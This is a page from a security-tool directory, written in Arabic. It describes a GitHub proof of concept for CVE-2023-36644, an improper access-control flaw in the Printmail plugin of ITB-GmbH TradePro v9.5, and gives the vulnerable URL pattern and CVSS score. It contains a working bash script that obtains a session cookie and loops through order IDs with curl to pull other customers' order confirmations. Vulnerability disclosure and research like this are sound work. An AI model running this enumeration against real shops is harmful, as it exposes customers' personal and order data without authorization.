Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-36644 — برهان مفهوم لاستغلال الثغرة CVE-2023-36644، يُظهر كشف المعلومات عن بُعد من خلال التحكم في الوصول غير الصحيح في إضافة Printmail الخاصة بـ ITB-GmbH TradePro الإصدار 9.5. يتضمن نص برمجي bash لتعداد تأكيد الطلبات. | Kitploit
أدوات/GitHubGitHub/caffeinated-labs/cve-2023-36644
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

برهان مفهوم لاستغلال الثغرة CVE-2023-36644، يُظهر كشف المعلومات عن بُعد من خلال التحكم في الوصول غير الصحيح في إضافة Printmail الخاصة بـ ITB-GmbH TradePro الإصدار 9.5. يتضمن نص برمجي bash لتعداد تأكيد الطلبات.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني
منذ 2 سنواتلم تتم المراجعة بعد

== البرامج المتأثرة [%hardbreaks] المورّد: ITB-GmbH المنتجات المتأثرة: TradePro (v9.5) المكوّن: Printmail Plugin مؤكد: نعم

== ناقل الهجوم [%hardbreaks] النوع: تحكم وصول غير صحيح نوع الوصول: عن بعد الأثر: كشف المعلومات

يسمح تحكم الوصول غير الصحيح في المكوّن الإضافي printmail في TradePro v9.5 من ITB-GmbH للمهاجمين عن بعد بتلقي جميع تأكيدات الطلبات من المتجر الإلكتروني عن طريق تمرير أرقام طلبات عشوائية إلى نقطة نهاية http(s).

== الوصف يجب أن يكون orderid معروفًا مسبقًا ولكن يمكن تعداده بسهولة أو باستخدام SQLi (انظر التقرير link:/security/CVE-2023-36645[CVE-2023-36645])

استدعاء http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] مع ملف تعريف ارتباط جلسة صالح ولكن غير مصادق يعطي المهاجم إمكانية الوصول إلى جميع تأكيدات الطلبات.

== CVSS [%hardbreaks] الدرجة: 7.1 المتجه: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== الاعتمادات

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
تنزيل الأداة